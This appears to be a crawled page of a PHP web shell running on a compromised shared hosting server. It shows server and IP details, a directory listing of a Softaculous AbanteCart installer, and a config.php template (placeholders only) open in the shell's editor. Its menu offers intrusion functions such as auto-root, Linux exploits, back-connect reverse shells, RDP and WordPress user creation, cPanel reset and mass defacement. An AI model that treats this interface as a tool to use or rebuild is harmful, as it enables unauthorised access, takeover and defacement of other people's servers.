Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 18.224.153.49
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
abante /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
abante.sql
1.39
MB
-rw-r--r--
abante.zip
50.49
MB
-rw-r--r--
changelog.txt
8.2
KB
-rw-r--r--
clone.php
6.4
KB
-rw-r--r--
config.php
1.42
KB
-rw-r--r--
edit.php
5.26
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
1.9
KB
-rw-r--r--
fileindex.php
212
B
-rw-r--r--
import.php
5.02
KB
-rw-r--r--
info.xml
3.54
KB
-rw-r--r--
install.js
1.02
KB
-rw-r--r--
install.php
8.75
KB
-rw-r--r--
install.xml
1.63
KB
-rw-r--r--
md5
1000
B
-rw-r--r--
notes.txt
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** AbanteCart, Ideal OpenSource Ecommerce Solution https://www.AbanteCart.com Copyright © 2011-2025 Belavier Commerce LLC Released under the Open Software License (OSL 3.0) */ const SERVER_NAME = '[[domhost]]'; // Admin Section Configuration. You can change this value to any name. Will use ?s=name to access the admin const ADMIN_PATH = '[[admin_realname]]'; // Database Configuration const DB_DRIVER = 'amysqli'; const DB_HOSTNAME = '[[softdbhost]]'; const DB_PORT = 3306; const DB_USERNAME = '[[softdbuser]]'; const DB_PASSWORD = '[[softdbpass]]'; const DB_DATABASE = '[[softdb]]'; const DB_PREFIX = '[[dbprefix]]'; const CACHE_DRIVER = 'file'; // Unique AbanteCart store ID const UNIQUE_ID = '[[UNIQUE_ID]]'; // Encryption key for protecting sensitive information. NOTE: Change of this key will cause a loss of all existing encrypted information! const ENCRYPTION_KEY = '[[ENCRYPTION_KEY]]'; // details about allowed DSN settings https://symfony.com/doc/6.0/mailer.html#transport-setup /* const MAILER = [ //'dsn' => null, // OR 'protocol' => 'smtp', // or ses+smtp, gmail+smtp, mandrill+smtp, mailgun+smtp, mailjet+smtp, postmark+smtp, sendgrid+smtp, sendinblue+smtp, ohmysmtp+smtp //we use "username" also as ID, KEY, API_TOKEN, ACCESS_KEY 'username' => 'merchant@yourdomain.com', 'password' => '****super-secret-password****', 'host' => 'your-hostname', 'port' => 465 //or 587 etc ]; */
Close